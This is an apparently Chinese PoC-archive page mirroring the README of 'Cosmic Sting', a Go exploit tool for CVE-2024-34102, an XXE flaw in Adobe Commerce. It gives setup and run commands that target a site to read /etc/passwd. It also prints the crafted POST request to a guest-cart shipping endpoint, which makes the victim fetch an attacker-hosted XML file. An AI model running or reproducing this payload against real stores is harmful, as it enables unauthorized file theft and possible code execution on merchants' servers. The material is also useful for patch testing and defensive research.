目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2024-34102 PoC — Adobe Commerce 代码问题漏洞

来源
https://github.com/bughuntar/CVE-2024-34102
关联漏洞
标题:Adobe Commerce 代码问题漏洞 (CVE-2024-34102)
Description:Adobe Commerce是美国奥多比(Adobe)公司的一种面向商家和品牌的全球领先的数字商务解决方案。 Adobe Commerce 存在代码问题漏洞,该漏洞源于受到不正确的 XML 外部实体引用 ( XXE ) 限制漏洞的影响,该漏洞可能导致任意代码执行。
Description
Exploitation CVE-2024-34102
介绍
# Cosmic Sting: CVE-2024-34102 Exploiter

Cosmic Sting is a Go-based tool designed to exploit CVE-2024-34102, Remote Code Execution vulnerability.

## CVE-2024-34102 Detail
Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.

## Prerequisites

- Go (1.16 or higher)

## Installation

1. Clone the repository:
    ```sh
    git clone https://github.com/bughuntar/CVE-2024-34102.git &&
    cd CVE-2024-34102
    ```

2. Install dependencies (if any):
    ```sh
    go version &&
    go mod init cosmic_sting &&
    go get github.com/fatih/color &&
    go get github.com/google/uuid &&
    go get github.com/urfave/cli/v2
    ```

### Single URL

To run the tool with a single URL:

```sh
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"
```

## Flags

- `-u`, `--url` : Single URL to exploit.
- `-f`, `--file` : File to read via SSRF.
- `-l`, `--list` : File containing list of URLs to exploit.


## Crafted XML DTD file POST request:
```
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}
```

### License
This project is not licensed, only made for personal project.

### Contributing
Contributions are welcome! Please open an issue or submit a pull request for any changes.

### Disclaimer
This tool is intended for educational purposes only. Use it responsibly and only on systems you have permission to test.

### Author
Professor the Hunter --> [Follow me on Twitter](https://x.com/bughuntar)
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →